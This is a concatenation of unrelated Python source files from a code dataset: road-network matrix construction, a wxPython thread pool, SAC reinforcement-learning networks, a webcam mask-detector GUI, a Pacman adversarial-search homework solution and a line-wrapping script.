Edge2target = dict(df_road[['id', 'pid2']].values)\n\n with open(f'results/net/Edge2source_{cityname}.json', 'w') as json_file:\n json.dump(Edge2source, json_file, cls=NpEncoder)\n \n with open(f'results/net/Edge2target_{cityname}.json', 'w') as json_file:\n json.dump(Edge2target, json_file, cls=NpEncoder)\n\n return\n\n# def GetMobilityAdjacencyMatrix(directory, Edge2source, Edge2target):\n \n# # load the mobility demand\n# print(f'Processing {directory} mobility demand')\n# file_name = f\"{directory}/dict_mobility_demand.json\"\n\n# with open(file_name) as f:\n# mob = json.load(f)\n\n# edge_list = [x['edges'] for x in mob.values()]\n# edge_list = pd.DataFrame(edge_list, columns = ['e1', 'e2'])\n\n# # define the mobility demand on nodes and save\n# mob1 = pd.DataFrame(np.array([edge_list.e1.map(lambda x: Edge2source[x]).values, edge_list.e2.map(lambda x: Edge2source[x]).values]).T, columns = ['source', 'target'])\n# mob2 = pd.DataFrame(np.array([edge_list.e1.map(lambda x: Edge2source[x]).values, edge_list.e2.map(lambda x: Edge2target[x]).values]).T, columns = ['source', 'target'])\n# mob3 = pd.DataFrame(np.array([edge_list.e1.map(lambda x: Edge2target[x]).values, edge_list.e2.map(lambda x: Edge2source[x]).values]).T, columns = ['source', 'target'])\n# mob4 = pd.DataFrame(np.array([edge_list.e1.map(lambda x: Edge2target[x]).values, edge_list.e2.map(lambda x: Edge2target[x]).values]).T, columns = ['source', 'target'])\n\n# mob = pd.concat([mob1, mob2, mob3, mob4]) \n# mob.to_csv(f'{directory}/EL.csv', index = False)\n\n# return\n\ndef dict_with_nan_mapper(x):\n try:\n y = NodeEdges2Edge[x]\n except:\n y = np.nan\n return y\n\ndef GetNBMatrix(cityname):\n\n # weight function of the distance\n f = lambda x: 1/x\n\n # create a temporary folder in which to store some variables\n os.system('mkdir tmp')\n \n # get the road in plain format\n os.system(f'netconvert -s results/net/{cityname}_road_network.net.xml -p tmp/{cityname}_plain')\n\n ################################################################################################\n # load the node dataset\n tree_node = ET.parse(f'tmp/{cityname}_plain.nod.xml')\n root_node = tree_node.getroot()\n df_nodes = pd.DataFrame([tuple([x.get('id'), x.get('x'), x.get('y')]) for x in root_node],\n columns = ['node', 'lat', 'long']).dropna()\n df_nodes.set_index('node', inplace = True)\n df_nodes.lat = df_nodes.lat.values.astype(float)\n df_nodes.long = df_nodes.long.values.astype(float)\n\n # add an integer node identifier\n df_nodes['n_id'] = np.arange(len(df_nodes))\n NodeMapper = dict(zip(df_nodes.index, df_nodes.n_id))\n n = len(df_nodes)\n\n ################################################################################################\n # load the edge dataset\n tree_edge = ET.parse(f'tmp/{cityname}_plain.edg.xml')\n root_edge = tree_edge.getroot()\n\n df_edges = pd.DataFrame([tuple([x.get('id'), x.get('from'), x.get('to')]) for x in root_edge],\n columns = ['id', 'source', 'target']).dropna()\n \n # add the edge length\n df_edges['d'] = df_edges.apply(lambda x: np.linalg.norm(df_nodes.loc[x.source] \\\n - df_nodes.loc[x.target]), axis = 1)\n \n # add an integer edge identifier\n df_edges['n_id'] = np.arange(len(df_edges))\n EdgeMapper = dict(zip(df_edges.id, df_edges.n_id))\n df_edges['n_source'] = df_edges.source.map(lambda x: NodeMapper[x])\n df_edges['n_target'] = df_edges.target.map(lambda x: NodeMapper[x])\n E = len(df_edges)\n \n #################################################################################################\n\n # build the matrices T and Q\n T = csr_matrix((1/df_edges.d, (df_edges.n_source, df_edges.n_id)), shape = (n, E))\n Q = csr_matrix((np.ones(len(df_edges)), (df_edges.n_target, df_edges.n_id)), shape = (n, E))\n\n # build the matrix M\n # NodeEdges2Edge = dict(zip(df_edges.apply(lambda x: tuple([x.source, x.target]), axis = 1), df_edges.n_id))\n rev_el = pd.DataFrame(np.array([df_edges.apply(lambda x: dict_with_nan_mapper(tuple([x.target, x.source])), axis = 1), df_edges.n_id, df_edges.d]).T,\n columns = ['rev', 'str', 'd']).dropna()\n M = csr_matrix((f(rev_el.d), (rev_el.rev, rev_el.str)), shape = (E,E))\n \n # build the non-backtracking matrix \n B = Q.T@T - M\n\n ###################################################################################################\n\n # remove the temporary folder\n os.system('rm -r tmp')\n\n # save\n b = B.nonzero()\n df_B = pd.DataFrame([b[0], b[1], np.array(B[b])[0]]).transpose().rename(columns\\\n = {0: 'source', 1: 'target', 2: 'weight'})\n\n df_B.to_csv(f'results/net/{cityname}_B.csv', index = False)\n\n with open(f'results/net/EdgeMapper_{cityname}.json', 'w') as json_file:\n json.dump(EdgeMapper, json_file, cls=NpEncoder)\n\n return","repo_name":"rschifan/ISICO2","sub_path":"src/get_adjacency_matrices.py","file_name":"get_adjacency_matrices.py","file_ext":"py","file_size_in_byte":6672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10122379602","text":"\"\"\"Background processing for wxEventHandler-derived classes\"\"\"\nimport logging\nimport time\nfrom concurrent.futures import ThreadPoolExecutor\nfrom functools import partial\n\nimport wx\nimport wx.lib.newevent\n\n\n(FutureCompleteEvent, EVT_FUTURE_COMPLETE) = wx.lib.newevent.NewEvent()\n\n\nclass ThreadPool:\n def __init__(self, target, max_workers=8):\n self.target = target\n self.pool = ThreadPoolExecutor(max_workers=max_workers)\n target.Bind(EVT_FUTURE_COMPLETE, self.OnFutureComplete)\n\n def shutdown(self, *args, **kwargs):\n self.pool.shutdown(*args, **kwargs)\n\n def run(self, f, *args, callback=None, **kwargs):\n def wrapper(*args, **kwargs):\n try:\n start = time.time()\n fn_name = '.'.join(filter(None, (f.__module__, f.__qualname__)))\n fn_args = ', '.join((*map(repr, args),\n *(f'{k}={v!r}' for k,v in kwargs.items())))\n logging.info(\"Background function %s start with args (%s)\",\n fn_name, fn_args)\n ret = f(*args, **kwargs)\n logging.info(\"Background function %s took %0.3f seconds.\",\n fn_name, time.time() - start)\n return ret\n except Exception:\n logging.exception(\"Exception in background thread %s\", fn_name)\n raise\n future = self.pool.submit(wrapper, *args, **kwargs)\n if callback:\n future.add_done_callback(partial(self.post_future_event, callback))\n\n def post_future_event(self, callback, future):\n wx.PostEvent(self.target,\n FutureCompleteEvent(callback=callback,\n result=future.result()))\n\n def OnFutureComplete(self, evt):\n evt.callback(evt.result)\n","repo_name":"mrichards42/quarantine-chorus","sub_path":"standalone/app/ui/background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39555307695","text":"import torch as T\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.distributions.normal as Normal\n\nclass Actor(nn.Module):\n def __init__(self, n_inputs, n_actions, max_action, lr=1e-3, fc1_dims=256, fc2_dims=256, reparam_noise=1e-6) -> None:\n super(Actor, self).__init__()\n self.reparam_noise = reparam_noise\n self.max_action = max_action\n\n self.fc1 = nn.Linear(*n_inputs, fc1_dims)\n self.fc2 = nn.Linear(fc1_dims, fc2_dims)\n self.mu = nn.Linear(fc2_dims, n_actions)\n self.sigma = nn.Linear(fc2_dims, n_actions)\n\n self.optim = optim.Adam(self.parameters(), lr=lr)\n self.device = T.device('cuda:0' if T.cuda.is_available() else 'cpu')\n self.to(self.device)\n\n def foward(self, state):\n state = state.to(self.device)\n x = F.relu(self.fc1(state))\n x = F.relu(self.fc2(x))\n\n mu = self.mu(x)\n sigma = self.sigma(x)\n sigma = T.clamp(sigma, min=self.reparam_noise, max=1)\n\n return mu, sigma\n\n def sample_normal(self, state, reparameterize=True):\n mu, sigma = self.forward(state)\n action_dist = Normal(mu, sigma)\n\n if reparameterize:\n actions = action_dist.rsample()\n else:\n actions = action_dist.sample()\n\n action = T.tanh(actions) * T.tensor(self.max_actions).to(self.device)\n\n log_prob = action_dist.log_prob(actions)\n log_prob -= T.log(1-action.pow(2) + self.reparam_noise)\n log_prob = log_prob.sum(1, keepdim=True)\n\n return action, log_prob\n\n\nclass Value(nn.Module):\n def __init__(self, n_inputs, lr=1e-3, fc1_dims=256, fc2_dims=256) -> None:\n super(Value, self).__init__()\n self.fc1 = nn.Linear(*n_inputs, fc1_dims)\n self.fc2 = nn.Linear(fc1_dims, fc2_dims)\n self.v = nn.Linear(fc2_dims, 1)\n\n self.optim = optim.Adam(self.parameters(), lr=lr)\n self.device = T.device('cuda:0' if T.cuda.is_available() else 'cpu')\n self.to(self.device)\n\n def forward(self, state):\n state = state.to(self.device)\n x = F.relu(self.fc1(state))\n x = F.relu(self.fc2(x))\n state_value = self.v(x)\n\n return state_value\n\nclass Critic(nn.Module):\n def __init__(self, n_inputs, n_actions, lr=1e-3, fc1_dims=256, fc2_dims=256) -> None:\n super(Critic, self).__init__()\n self.fc1 = nn.Linear(*n_inputs + n_actions, fc1_dims)\n self.fc2 = nn.Linear(fc1_dims, fc2_dims)\n self.q = nn.Linear(fc2_dims, 1)\n\n self.optim = optim.Adam(self.parameters(), lr=lr)\n self.device = T.device('cuda:0' if T.cuda.is_available() else 'cpu')\n self.to(self.device)\n\n def forward(self, state, actions):\n state = state.to(self.device)\n actions = actions.to(self.device)\n\n x = F.relu(self.fc1(T.cat([state, actions], dim=1)))\n x = F.relu(self.fc2(x))\n q_value = self.q(x)\n\n return q_value\n","repo_name":"FlutteryEmbers/DeepLearning","sub_path":"Reinforcement Learning/networks/sac_net.py","file_name":"sac_net.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"28912984414","text":"from tkinter import *\r\nfrom keras.models import load_model\r\nimport cv2\r\nimport numpy as np\r\n\r\nroot = Tk()\r\nroot.title(\"Mask Detector\")\r\nroot.iconbitmap(\"mask_icon.ico\")\r\nroot.geometry(\"600x600\")\r\nroot.configure(bg=\"black\")\r\n\r\nfor i in range(3):\r\n for j in range(2):\r\n Grid.rowconfigure(root, i, weight=1)\r\n Grid.columnconfigure(root, j, weight=1)\r\n\r\nstop_check = False\r\n\r\n\r\ndef start_btn():\r\n model = load_model('model-019.model')\r\n\r\n face_clsfr = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n\r\n source = cv2.VideoCapture(0)\r\n\r\n labels_dict = {0: 'MASK', 1: 'NO MASK'}\r\n color_dict = {0: (0, 255, 0), 1: (0, 0, 255)}\r\n\r\n while True:\r\n\r\n ret, img = source.read()\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n faces = face_clsfr.detectMultiScale(gray, 1.3, 5)\r\n\r\n for x, y, w, h in faces:\r\n face_img = gray[y:y + w, x:x + w]\r\n resized = cv2.resize(face_img, (100, 100))\r\n normalized = resized / 255.0\r\n reshaped = np.reshape(normalized, (1, 100, 100, 1))\r\n result = model.predict(reshaped)\r\n\r\n label = np.argmax(result, axis=1)[0]\r\n\r\n cv2.rectangle(img, (x, y), (x + w, y + h), color_dict[label], 2)\r\n cv2.rectangle(img, (x, y - 40), (x + w, y), color_dict[label], -1)\r\n cv2.putText(img, labels_dict[label], (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 255, 255), 2)\r\n\r\n cv2.imshow(\"Mask Detector\", img)\r\n\r\n key = cv2.waitKey(1)\r\n if key == 32:\r\n cv2.waitKey()\r\n\r\n if key == 27 or stop_check:\r\n cv2.destroyAllWindows()\r\n source.release()\r\n break\r\n\r\n\r\n\r\ndef stop_btn():\r\n global stop_check\r\n stop_check = True\r\n\r\n\r\ndisplay_label = Label(root, text=\"The screen below detects whether a person has worn a mask or not\", font=(\"Arial\", 12))\r\ndisplay_label.grid(row=0, column=0, columnspan=2, sticky=E+W)\r\n\r\nframe = LabelFrame(root, text=\"\", padx=150, pady=150, bg=\"blue\")\r\nframe.grid(row=1, column=0, columnspan=2, padx=10, pady=10)\r\n\r\nstart_img = PhotoImage(file=\"start.png\").subsample(4, 4)\r\nstop_img = PhotoImage(file=\"stop.png\").subsample(4, 4)\r\n\r\n\r\nstart_btn = Button(root, image=start_img, borderwidth=0, bg=\"black\", command=start_btn)\r\nstart_btn.grid(row=2, column=0, rowspan=2, sticky=E+W)\r\n\r\npause_label = Label(root, text=\"Press spacebar to pause\", bg=\"black\", fg=\"green\", font=(\"Arial\", 12))\r\npause_label.grid(row=2, column=1, sticky=E+W)\r\n\r\nstop_label = Label(root, text=\"Press Esc to stop the video\", bg=\"black\", fg=\"green\", font=(\"Arial\", 12))\r\nstop_label.grid(row=3, column=1, sticky=E+W)\r\n\r\nmade_by_label = Label(root, text=\"Made by: Rishit Daru\", anchor=E, bg=\"black\", fg=\"red\", font=(\"Arial\", 12))\r\nmade_by_label.grid(row=4, column=1, columnspan=2, sticky=E+W, pady=20)\r\n\r\n\r\nb = Label(frame, text=\"\")\r\nb.pack()\r\n\r\nroot.mainloop()\r\n\r\n\r\n","repo_name":"rishitdaru/Mask-Detector","sub_path":"mask_detector_gui_app.py","file_name":"mask_detector_gui_app.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70691622841","text":"# multiAgents.py\n# --------------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n#Code by Dylan Sholtes in Collaboration with Bhuvaneshwar Mohan\nfrom util import manhattanDistance\nfrom game import Directions\nimport random, util\n\nfrom game import Agent\n\nclass ReflexAgent(Agent):\n \"\"\"\n A reflex agent chooses an action at each choice point by examining\n its alternatives via a state evaluation function.\n\n The code below is provided as a guide. You are welcome to change\n it in any way you see fit, so long as you don't touch our method\n headers.\n \"\"\"\n\n\n def getAction(self, gameState):\n \"\"\"\n You do not need to change this method, but you're welcome to.\n\n getAction chooses among the best options according to the evaluation function.\n\n Just like in the previous project, getAction takes a GameState and returns\n some Directions.X for some X in the set {North, South, West, East, Stop}\n \"\"\"\n # Collect legal moves and successor states\n legalMoves = gameState.getLegalActions()\n\n # Choose one of the best actions\n scores = [self.evaluationFunction(gameState, action) for action in legalMoves]\n bestScore = max(scores)\n bestIndices = [index for index in range(len(scores)) if scores[index] == bestScore]\n chosenIndex = random.choice(bestIndices) # Pick randomly among the best\n\n \"Add more of your code here if you want to\"\n\n return legalMoves[chosenIndex]\n\n def evaluationFunction(self, currentGameState, action):\n \"\"\"\n Design a better evaluation function here.\n\n The evaluation function takes in the current and proposed successor\n GameStates (pacman.py) and returns a number, where higher numbers are better.\n\n The code below extracts some useful information from the state, like the\n remaining food (newFood) and Pacman position after moving (newPos).\n newScaredTimes holds the number of moves that each ghost will remain\n scared because of Pacman having eaten a power pellet.\n\n Print out these variables to see what you're getting, then combine them\n to create a masterful evaluation function.\n \"\"\"\n # Useful information you can extract from a GameState (pacman.py)\n successorGameState = currentGameState.generatePacmanSuccessor(action)\n newPos = successorGameState.getPacmanPosition()\n newFood = successorGameState.getFood()\n newGhostStates = successorGameState.getGhostStates()\n newScaredTimes = [ghostState.scaredTimer for ghostState in newGhostStates]\n\n \"*** YOUR CODE HERE ***\"\n currPos = currentGameState.getPacmanPosition()\n currFood = currentGameState.getFood()\n #store food as a list, to compare lengths of foodLists to find food score\n foodList = currFood.asList()\n newFoodList = newFood.asList()\n #calculate ghost score, set default ghost score to be zero\n ghostScore = 0\n #get the new ghost positions\n newGhostPositions = successorGameState.getGhostPositions()\n #set the minGhostDistance to be the manhattan distance of the new pacman position to the first ghost\n #we will use this as a basis of comparison to find the closest ghost to pacmans new position\n minGhostDistance = util.manhattanDistance(newPos, newGhostPositions[0])\n for ghost in newGhostPositions:\n if minGhostDistance > util.manhattanDistance(newPos, ghost):\n #if the manhattanPosition of a ghost is less than the current minGhost distance\n #set the minGhost distance to be the manhattanDistance of the new ghost\n minGhostDistance = util.manhattanDistance(newPos, ghost)\n #check the minimum ghost distance, and assign a negative value accordingly\n #if the ghosts are not scared, being close to a ghost is really bad\n if newScaredTimes == 0:\n # if the ghost is closer, the ghostscore is a more negative number\n # half ghost score for each tile the ghost gets further from the pacman position\n # once ghost distance is larger than 4, ghost distance becomes 0\n # that means the closest ghost is at least five tiles away from pacman, and not currently a problem\n if minGhostDistance <= 2:\n ghostScore = -50\n elif minGhostDistance <= 3:\n ghostScore = -25\n elif minGhostDistance <= 4:\n ghostScore = -12\n else:\n ghostScore = 0\n #if the ghosts are scared, being close to a ghost isnt the worst, but best to not get too close\n else:\n #if pacman is one tile away from a ghost, large negative penalty\n #once pacman is two or 3 tiles away, the penalty decreases, since ghosts are not dangerous when scared\n #once larger than 3 tiles away, ghosts are not a threat while scared, so no penalty occurs\n if minGhostDistance == 1:\n ghostScore = -25\n elif minGhostDistance <=3:\n ghostScore = -5\n else:\n ghostScore = 0\n\n foodScore = 0\n #if the length of the newFoodList is less than the length of the currentFoodList\n #pacman has collected food in his new state\n #if pacman has collected no food, the lengths of both lists will be the same\n #in that case, foodScore will be 1/ the minimum manhattan distance to the closest food\n #this allows foodScore to increase the closer pacman is to food\n #without giving too mucn incentive into the food to where pacman runs himself into ghosts\n if len(foodList) - len(newFoodList) != 0:\n foodScore = 1 * len(foodList) - len(newFoodList)\n else:\n minFoodDistance = manhattanDistance(newPos, newFoodList[0])\n for food in newFoodList:\n if minFoodDistance > manhattanDistance(newPos, food):\n minFoodDistance = manhattanDistance(newPos, food)\n foodScore = 1 /float(minFoodDistance)\n #pacman is penalized for taking actions that does not decrease the amount of food left on the board\n remainingFoodPenalty = len(newFoodList)\n\n #total the ghostScore, foodScore, and the penalty for remainingFood\n return ghostScore + foodScore - remainingFoodPenalty\n\ndef scoreEvaluationFunction(currentGameState):\n \"\"\"\n This default evaluation function just returns the score of the state.\n The score is the same one displayed in the Pacman GUI.\n\n This evaluation function is meant for use with adversarial search agents\n (not reflex agents).\n \"\"\"\n return currentGameState.getScore()\n\nclass MultiAgentSearchAgent(Agent):\n \"\"\"\n This class provides some common elements to all of your\n multi-agent searchers. Any methods defined here will be available\n to the MinimaxPacmanAgent, AlphaBetaPacmanAgent & ExpectimaxPacmanAgent.\n\n You *do not* need to make any changes here, but you can if you want to\n add functionality to all your adversarial search agents. Please do not\n remove anything, however.\n\n Note: this is an abstract class: one that should not be instantiated. It's\n only partially specified, and designed to be extended. Agent (game.py)\n is another abstract class.\n \"\"\"\n\n def __init__(self, evalFn = 'scoreEvaluationFunction', depth = '2'):\n self.index = 0 # Pacman is always agent index 0\n self.evaluationFunction = util.lookup(evalFn, globals())\n self.depth = int(depth)\n\nclass MinimaxAgent(MultiAgentSearchAgent):\n \"\"\"\n Your minimax agent (question 2)\n \"\"\"\n\n def getAction(self, gameState):\n \"\"\"\n Returns the minimax action from the current gameState using self.depth\n and self.evaluationFunction.\n\n Here are some method calls that might be useful when implementing minimax.\n\n gameState.getLegalActions(agentIndex):\n Returns a list of legal actions for an agent\n agentIndex=0 means Pacman, ghosts are >= 1\n\n gameState.generateSuccessor(agentIndex, action):\n Returns the successor game state after an agent takes an action\n\n gameState.getNumAgents():\n Returns the total number of agents in the game\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n def maxValue(state, depth, agentIndex):\n #if terminal tests return utility\n if depth == self.depth or state.isLose() or state.isWin():\n return self.evaluationFunction(state)\n #initializing v to be -infinity\n v = float('-inf')\n #loop through actions and find max score\n for action in state.getLegalActions(agentIndex):\n successorState = state.generateSuccessor(agentIndex, action)\n #this finds the max of the minimum values\n v = max(v, minValue(successorState, depth, 1))\n return v\n\n\n def minValue(state, depth, agentIndex):\n #if terminal tests, return utility\n if depth == self.depth or state.isLose() or state.isWin():\n return self.evaluationFunction(state)\n v = float('inf')\n #loop through actions for agentIndex\n for action in state.getLegalActions(agentIndex):\n #if the agentIndex is a ghost agent, continue to call minValue\n if agentIndex < state.getNumAgents() - 1:\n successorState = state.generateSuccessor(agentIndex, action)\n v = min(v, minValue(successorState, depth, agentIndex + 1))\n #once minValue of all ghost agents has been found, increase depth, and find the maxValue of pacman\n else:\n successorState = state.generateSuccessor(agentIndex, action)\n #this will return the smallest maxValue\n v = min(v, maxValue(successorState, depth + 1, 0))\n return v\n\n def minimaxDecision():\n #initialize v to be -infinity\n v = float('-inf')\n #loop through pacman's legal actions\n for action in gameState.getLegalActions(0):\n #find successor pacman state based on action\n successorState = gameState.generateSuccessor(0, action)\n #find the action with the highest min value\n score = minValue(successorState, 0, 1)\n # if an action has a higher minValue, update v to be score of the new action\n #update bestAction to be the new highest min value\n if score > v:\n v = score\n bestAction = action\n return bestAction\n return minimaxDecision()\n\n util.raiseNotDefined()\n\nclass AlphaBetaAgent(MultiAgentSearchAgent):\n \"\"\"\n Your minimax agent with alpha-beta pruning (question 3)\n \"\"\"\n\n def getAction(self, gameState):\n \"\"\"\n Returns the minimax action using self.depth and self.evaluationFunction\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n def maxValue(state, alpha, beta, depth, agentIndex):\n v = float('-inf')\n #if terminal tests return utility\n if depth == self.depth or state.isWin() or state.isLose():\n return self.evaluationFunction(state)\n #loop through pacmans actions\n for action in state.getLegalActions():\n successorState = state.generateSuccessor(agentIndex, action)\n #find the largest minValue\n v = max(v, minValue(successorState, alpha, beta, depth, 1))\n #stop searching tree early if value is greater than beta\n if v > beta:\n return v\n #update alpha to be the max of v and alpha\n alpha = max(alpha, v)\n return v\n def minValue(state, alpha, beta,depth, agentIndex):\n v = float('inf')\n if depth == self.depth or state.isWin() or state.isLose():\n return self.evaluationFunction(state)\n #loop through current agents actions\n for action in state.getLegalActions(agentIndex):\n successorState = state.generateSuccessor(agentIndex, action)\n #if agent is a ghost, get smallest minValue\n if agentIndex < state.getNumAgents() - 1:\n v = min(v, minValue(successorState, alpha, beta, depth, agentIndex + 1))\n #once all of the minValues for the ghosts have been found\n #find the smallest maxValue for pacman\n else:\n v = min(v, maxValue(successorState, alpha, beta, depth + 1, 0))\n #stop searching tree early is value is less than alpha\n if v < alpha:\n return v\n #update beta to be the min of v and beta\n beta = min(beta, v)\n return v\n def alphabetadecision():\n v = float('-inf')\n alpha = float('-inf')\n beta = float('inf')\n for action in gameState.getLegalActions():\n successorState = gameState.generateSuccessor(0, action)\n score = minValue(successorState, alpha, beta, 0 , 1)\n #if an action has a higher min score, update v to be score\n #update bestAction to be action\n if score > v:\n v = score\n bestAction = action\n #update alpha to be the max of v and alpha\n alpha = max(alpha, v)\n return bestAction\n return alphabetadecision()\n\n\n\n\n\nclass ExpectimaxAgent(MultiAgentSearchAgent):\n \"\"\"\n Your expectimax agent (question 4)\n \"\"\"\n\n def getAction(self, gameState):\n \"\"\"\n Returns the expectimax action using self.depth and self.evaluationFunction\n\n All ghosts should be modeled as choosing uniformly at random from their\n legal moves.\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n\n def value(depth, agent, state):\n # run evaluation function if terminal state or max depth has been reached\n if state.isWin() or state.isLose() or depth == self.depth:\n return (self.evaluationFunction(state), Directions.STOP)\n\n # Max val will only accept pacman\n if agent == 0:\n return max_val(depth, agent, state)\n else:\n # Run expectimax on all ghost agents\n return exp_val(depth, agent, state)\n\n def max_val(depth, agent, state):\n \"\"\"Evaluates max node similar to minimax\"\"\"\n v = (float(\"-inf\"), None) # initialize max score\n\n # get all legal actions for pacman\n actions = state.getLegalActions(agent)\n\n # increment index for successive states\n successorIndex = agent + 1\n # if legal actions exist\n if actions:\n # iterate through actions\n for action in actions:\n # generate successor state\n successorState = state.generateSuccessor(agent, action)\n # pass to value to run expectimax on the ghosts\n successorVal = value(depth, successorIndex, successorState)\n # replace existing value if expectimax returns a larger value\n v = max([v, (successorVal[0], action)], key=lambda x: x[0])\n else:\n # if no available actions, run evaluationfucntion\n return value(self.depth, 0, state)\n\n return v\n\n def exp_val(depth, agent, state):\n \"\"\"Evaluates chance nodes with uncertain outcomes using weighted average of succesive nodes\"\"\"\n v = (0, None) # initialize expectimax value for ghosts\n #grab legal actions for ghost\n actions = state.getLegalActions(agent)\n\n successorIndex = agent + 1\n # if the index reaches the number of agents, pacman is next agent\n #this will only occur after expectimax runs on all ghosts\n if gameState.getNumAgents() == successorIndex:\n successorIndex = 0\n depth += 1\n\n num_actions = len(actions)\n if actions:\n for action in actions:\n #generate successor to agent\n successorState = state.generateSuccessor(agent, action)\n #find the value of the successor\n successorVal = value(depth, successorIndex, successorState)\n # running total of children's expectimax values\n v_sum = v[0] + successorVal[0]\n v = (v_sum, action)\n # weight the sum of expected values\n # with the probablity of an action occuring over all available actions (uniform distribution)\n v = (v[0] / float(num_actions), None)\n else:\n # if no available actions, run evaluationfucntion\n return value(self.depth, 0, state)\n\n return v\n\n # return expectimax action\n return value(0, 0, gameState)[1]\n util.raiseNotDefined()\n\ndef betterEvaluationFunction(currentGameState):\n \"\"\"\n Your extreme ghost-hunting, pellet-nabbing, food-gobbling, unstoppable\n evaluation function (question 5).\n\n DESCRIPTION: \n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # State data\n newPos = currentGameState.getPacmanPosition()\n newFood = currentGameState.getFood()\n newGhostStates = currentGameState.getGhostStates()\n newScaredTimes = [ghostState.scaredTimer for ghostState in newGhostStates]\n\n # GHOSTS\n #if ghosts are close and scared, or far away add points, if ghosts are not scared and close, lose points\n sumGhostDist = 0\n minGhostDist = (float(\"inf\"), None)\n scaredBonus = 0\n for ghost in newGhostStates:\n ghostPos = ghost.getPosition()\n ghostDist = manhattanDistance(newPos, ghostPos)\n # finding the minimum ghost position from the current position in order to determine contingencies\n minGhostDist = min(minGhostDist, (ghostDist, ghostPos), key=lambda x: x[0])\n #if ghosts are scared, no penalties for being close to a ghost will occur\n #give incentive for pacman to eat ghosts while they are scared\n if ghost.scaredTimer > 0:\n scaredBonus += 30 * len(newGhostStates)\n else:\n #If ghost is further than one tile away, don't worry about ghost\n #Increase score by small amount\n if ghostDist > 1:\n sumGhostDist += 1 / float(ghostDist) # 1/ghost_dist to increment sum relative to the current ghost\n # if at 1 place or closer decrease score, not a valid move for the current state\n elif ghostDist > 0:\n sumGhostDist -= 60 * 1 / float(ghostDist) # DANGER - decrement by a LARGE and relative value\n # Final ghost metric for game score\n ghostScore = scaredBonus + sumGhostDist\n # FOOD\n \"\"\"Food is usually abundant and is clustered next to other food nodes so pacman tries to \n follow a trail or clear a majority of the nodes in an area before moving on\"\"\"\n foodList = newFood.asList()\n minFoodDist = (float(\"inf\"), None)\n foodScore = 0\n for foodPos in foodList:\n foodDist = manhattanDistance(newPos, foodPos)\n #find the closest food to pacman by using smallest manhattan distance\n minFoodDist = min(minFoodDist, (foodDist, foodPos), key=lambda x: x[0])\n foodScore = 0\n # check if there is a food node stranded in the farther end of the board\n # and move towards the node if a ghost is not obstructing the path\n if minGhostDist and minFoodDist[1]:\n if minFoodDist[0] > minGhostDist[0] and not ( \\\n newPos[0] < minGhostDist[1][0] < minFoodDist[1][0] and newPos[1] < minGhostDist[1][1] <\n minFoodDist[1][1] and \\\n newPos[0] > minGhostDist[1][0] > minFoodDist[1][0] and newPos[1] > minGhostDist[1][1] >\n minFoodDist[1][1]):\n foodScore += 15\n # if a food node exists right next to pacman, add a large number to make pacman eat food\n #decrease foodScore bonus as min distance becomes further away\n if minFoodDist <= 1:\n foodScore += 40\n elif minFoodDist <= 2:\n foodScore += 25\n elif minFoodDist <= 3:\n foodScore += 15\n\n foodScore += 10 / float(minFoodDist[0])\n foodPenalty = -len(foodList)\n foodScore += foodPenalty\n # PELLET\n powerPellets = currentGameState.getCapsules()\n powerPelletProximityBonus = 0\n minPowerPelletDist = float(\"-inf\")\n if powerPellets:\n for pelletPos in powerPellets:\n # get distance to closest power pellet\n minPowerPelletDist = min(minPowerPelletDist, manhattanDistance(newPos, pelletPos))\n #if ghosts are not already scared\n #and a power pellet is closer than the min ghost distance\n #give incentive for pacman to grab powerpellet\n if abs(minGhostDist[0] - minPowerPelletDist) < 2 and newScaredTimes == 0:\n powerPelletProximityBonus += 20\n powerPelletProximityBonus += (\n 10 / float(minPowerPelletDist if minPowerPelletDist > 0 else 10))\n\n # total gameState score, foodScore, ghostScore, and the powerPellet bonus to get final score\n finalScore = currentGameState.getScore() + foodScore + ghostScore + powerPelletProximityBonus\n\n return finalScore\n util.raiseNotDefined()\n\n# Abbreviation\nbetter = betterEvaluationFunction\n\n","repo_name":"dpsholtes/Pacman-AI","sub_path":"multiagent/multiAgents.py","file_name":"multiAgents.py","file_ext":"py","file_size_in_byte":22502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9922020130","text":"\r\n\r\nlines=[]\r\nflines=[]\r\ninp_file= input(\"Enter the input filename:\\n\")\r\nout_file= input(\"Enter the output filename:\\n\")\r\nleng=eval(input(\"Enter the line width:\\n\"))\r\nrem=\"\"\r\nfile=open(inp_file,\"r\")\r\ncount=0\r\n\r\nfor line in file:\r\n rem=line\r\n while len(rem)>leng:\r\n k=rem[0:leng]\r\n s=k.rfind(\" \")\r\n \r\n lines.append(rem[0:s])\r\n rem=rem[s:len(rem)]\r\n\r\nlines.append(rem) \r\n\r\n\r\n\r\nfile.close()\r\n \r\n\r\noutfile=open(out_file,\"w\")\r\n\r\nfor i in range(len(lines)):\r\n if(lines[i][0]==\" \"):\r\n lines[i]=lines[i][1:]\r\n print(lines[i], file=outfile)\r\n\r\n\r\noutfile.close()\r\n\r\n\r\n 